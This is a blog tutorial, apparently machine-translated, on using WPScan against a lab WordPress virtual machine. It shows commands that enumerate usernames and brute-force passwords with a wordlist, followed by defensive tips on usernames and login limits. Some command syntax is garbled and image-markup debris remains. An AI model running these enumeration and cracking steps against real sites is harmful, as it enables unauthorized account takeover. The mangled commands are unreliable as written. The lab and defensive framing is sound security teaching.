Disclaimer: This document is for safe learning and teaching purposes only and is prohibited from unlawful use.
WordPress The black box scanner: Wpscan
Experimental results: Enumerate user lists, brute force user passwords,
Lab Environment:
Target drone: Turnkey Linux ( WordPress version)
attack aircraft: Kali Linux 2.0
Experimental steps:
1. download image, official website https://www.turnkeylinux.org/ Search WordPress The download contains only WordPress of the Turnkey Linux mirroring.
2.installed in the virtual machine, the steps are the same as the normal system installation, more configuration during installationWordPressthe steps, such asMySQLof theRootuser Password,WordPressof theAdminpasswords,Adminuser settings email (with default), InitializeHubInformation (ClickSkip), etc., appearWORDPRESS Appliance ServicesThe page indicates that the installation was successful and this page showsWordPressdetails of the app service, such asWebaddress,Webshelladdress and Port,Webminaddress,phpMyAdminaddresses and ports, andssh/sftpaddresses, ports, and so on. ,
650) this.width=650; "src=" Http://s2.51cto.com/wyfs02/M01/7A/31/wKiom1alqNqxrWoYAAHQ8QHlIBk185.jpg "title=" WordPress appliance services. jpg "alt=" wkiom1alqnqxrwoyaahq8qhlibk185.jpg "/>
(in the actual safety penetration test, assume that you have found WordPress site and some other information)
1. Update Vulnerability Library: wpscan–update
2. Scan target host for possible vulnerabilities: wpscan-u http://192.168.61.133
3. Enumerate the list of user names: wpscan-u 192.168.61.133–e u VP
650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M02/7A/31/wKiom1alqR-w2R4xAAD01GlwTTU165.jpg "style=" float: none; "title=" 111.jpg "alt=" Wkiom1alqr-w2r4xaad01glwttu165.jpg "/>
650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M02/7A/31/wKiom1alqSKSlRehAAGURPBdl20539.jpg "style=" float: none; "title=" 444.jpg "alt=" Wkiom1alqskslrehaagurpbdl20539.jpg "/>
4. use a dictionary to crack a user's password:
Wpscan-u 192.168.61.133–e u--wordlist/root/wordlist.txt
650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M02/7A/31/wKioL1alqfqDerlRAACjR8mkHl0652.jpg "title=" 333. JPG "alt=" wkiol1alqfqderlraacjr8mkhl0652.jpg "/>
Results
650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M02/7A/31/wKiom1alqdyzcWA4AAGURPBdl20107.jpg "title=" 444. JPG "alt=" wkiom1alqdyzcwa4aagurpbdl20107.jpg "/>
How to avoid WordPress User is enumerated
do not use usernames as nicknames, and do not take user names that are already known to the public. The best way to do this is to choose a name that contains random characters to do the username and use a different name for the nickname. wpscan scan URL to get username, so if you do not apply this username, you will certainly not be wpscan Search
How to avoid WordPress The password was violently cracked .
The best way to avoid brute force is to refer to the number of logins and IP address. The latest version of WordPress has this option by default. Make sure your limit entry is up to 3, increase the lock function (i.e. 6 password attempts are locked)
Turnkey Linux is a based on Ubuntu 8.04 LTS of the Linux The release version.
TurnKey Linuxis based onUbuntuVirtual Application Library, which integrates some of the best open source software into a fully available solution. Each virtual application is optimized for ease of use and can bedeploy in bare metal, virtual machines, and the cloud in minutes. Each virtual application is available in the form of a disc image or a virtual machine image, and this growing list of applications includesBugzilla,Django,Drupal,File Server,Joomla,LAMP,Magento,Mantis,MediaWiki,MoinMoin,Moodle,MovableType,MySQL,Openbravo,PhpBB,PostgreSQL,Projectpier,Rails,Revision Control,statusnet,Apache Tomcat,Torrent Server,Trac,TWiki,Vtiger,WordPress,Zimraand other.
This article is from the "Inner Peace" blog, make sure to keep this source http://isnull.blog.51cto.com/10388625/1738187
Use Wpscan to scan wordpress for user passwords